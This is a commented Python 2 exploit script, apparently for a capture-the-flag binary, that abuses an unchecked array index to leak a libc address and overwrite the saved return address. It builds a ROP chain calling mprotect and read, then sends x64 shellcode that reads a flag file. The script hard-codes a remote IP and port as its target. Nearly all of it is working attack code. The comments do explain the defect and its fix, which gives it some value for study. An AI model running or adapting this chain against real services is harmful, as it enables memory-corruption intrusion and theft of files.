# Python 2 exploit script (uses the `print` statement and `raw_input`) for a
# menu-driven binary whose "read by index" / "write by index" choices take an
# unchecked index.  Everything below rides on that single defect: the index is
# used to read and then overwrite stack slots, including what the script treats
# as the saved return address (`o_ret`).  Bounds-checking the index against the
# array length would remove the entire primitive; the hard-coded libc offset
# tables show the chain is also tied to one specific libc build.
import phun
import time


def cmd(idx):
    # Wait for the menu prompt and pick entry `idx` (1 = read, 2 = write, 3 = exit/other; inferred from use below).
    r.read('Choice')
    r.sendline(str(idx))


def peek(addr):
    # Menu entry 1: read the value stored at array index `addr` and return it as an int.
    # NOTE(review): relies on the service echoing the value after "is: "; no bounds check on the service side is what makes this an out-of-bounds read.
    cmd(1)
    r.read('Idx?')
    r.sendline('{:d}'.format(addr))
    r.read('is: ')
    d = r.readline().strip()
    d = int(d)
    return d


def poke(addr,val):
    # Menu entry 2: write `val` into array index `addr` (the out-of-bounds write primitive).
    cmd(2)
    r.read('Idx?')
    r.sendline('{:d}'.format(addr))
    r.read('number:')
    r.sendline('{:d}'.format(val))


# Per-libc-build offset tables; the entry is selected with gadgets[int(is_local)].
# 'offset' is the distance from the leaked __libc_start_main address to the libc base.
# These values are build-specific: any libc update invalidates the chain.
gadgets = [{
    'offset' : 0x20300,
    'poprsi' : 0x1fcbd,
    'poprdi' : 0x0001fd7a,
    'poprdx' : 0x1b92,
    'read': 0xf8880,
    'mprotect' : 0x102ca0,
},{
    'offset' : 0x20740,
    'poprsi' : 0x202e8,
    'poprdi' : 0x21102,
    'poprdx' : 0x01b92,
    'read': 0xf6670,
    'mprotect' : 0x100b80
}]

# Toggle between a local test instance and the original challenge host.
is_local = 0
if is_local:
    r = phun.Remote('192.168.122.234',1234)
else:
    r = phun.Remote('52.192.178.153',31337)

# Index the script treats as the slot holding the saved return address
# (array of 200 entries plus a few saved slots — inferred from the name; confirm against the binary).
o_ret = 200 + 1 + 2
ret = peek(o_ret)
# The leaked return address points back into __libc_start_main; subtracting a
# fixed distance (0xf1, adjusted by `is_local`) recovers that symbol and then
# the libc base.  This is how ASLR is defeated here: a single info leak.
libc_start_main = ret - 0xf1 + is_local
libc = libc_start_main - gadgets[int(is_local)]['offset']
print 'Return is {:08x}'.format(ret)
print('libc is {:08x}'.format(libc))
# ebfe = libc + 0x224f4
# mmap = libc + 0x102ba0
# system = libc + 0x456a0

if is_local:
    # Pause so a debugger can be attached before the stack is overwritten.
    raw_input('e')

# Resolve gadget and function addresses for the selected libc build.
poprsi = libc + gadgets[int(is_local)]['poprsi']
poprdi = libc + gadgets[int(is_local)]['poprdi']
poprdx = libc + gadgets[int(is_local)]['poprdx']
mprotect = libc + gadgets[int(is_local)]['mprotect']
read = libc + gadgets[int(is_local)]['read']

# Write the chain slot by slot starting at the return-address index.
i = o_ret
for _ in range(10):
    # Ten filler slots of poprdi+1 (presumably the bare `ret` one byte past `pop rdi` — confirm).
    poke(i, poprdi+1)
    i += 1

## overwrite rip
# Call 1: mprotect(libc, 0x1000, 6).  6 == PROT_WRITE|PROT_EXEC, so the first
# page of libc becomes writable and executable.
for p in (poprdi,libc,poprsi,0x1000,poprdx,6,mprotect):
    poke(i,p)
    i+=1

# Call 2: read(0, libc, 1024) — pulls the second-stage payload from stdin into that page.
for p in (poprdi,0,poprsi,libc,poprdx,1024,read):
    poke(i,p)
    i+=1

# Final slot: return into the page just filled.
poke(i,libc)
print 'rop setted up'

# Second stage: open the flag file, read it, write it to stdout.  The path is
# pushed onto the stack 8 bytes at a time (in reverse so it reads forward).
path = '/home/artifact/flag'
path = '\n'.join(map(lambda x: 'mov rax,%d\npush rax' % phun.u64(x), phun.chunks(path,8)[::-1]))
print path
# rax=2 open(rsp, 0, 2); rax=0 read(fd, rsp, 0x1000); rax=1 write(1, rsp, 0x1000).
p0 = phun.asm('''
%s
mov rdx,2
mov rax,2
mov rsi,0
mov rdi,rsp
syscall
mov r14,rax
mov rdi,r14
mov rsi,rsp
mov rdx,0x1000
mov rax,0
syscall
xor rdi,rdi
inc rdi
mov rsi,rsp
mov rdx,0x1000
mov rax,rdi
syscall
''' % path,arch='x64')

# Menu entry 3 makes the function return, which starts the chain; the short
# sleep gives the read() call time to be reached before the payload is sent.
cmd(3)
time.sleep(0.1)
# .write(payload)
# time.sleep(0.1)
r.write(p0)
print r.read()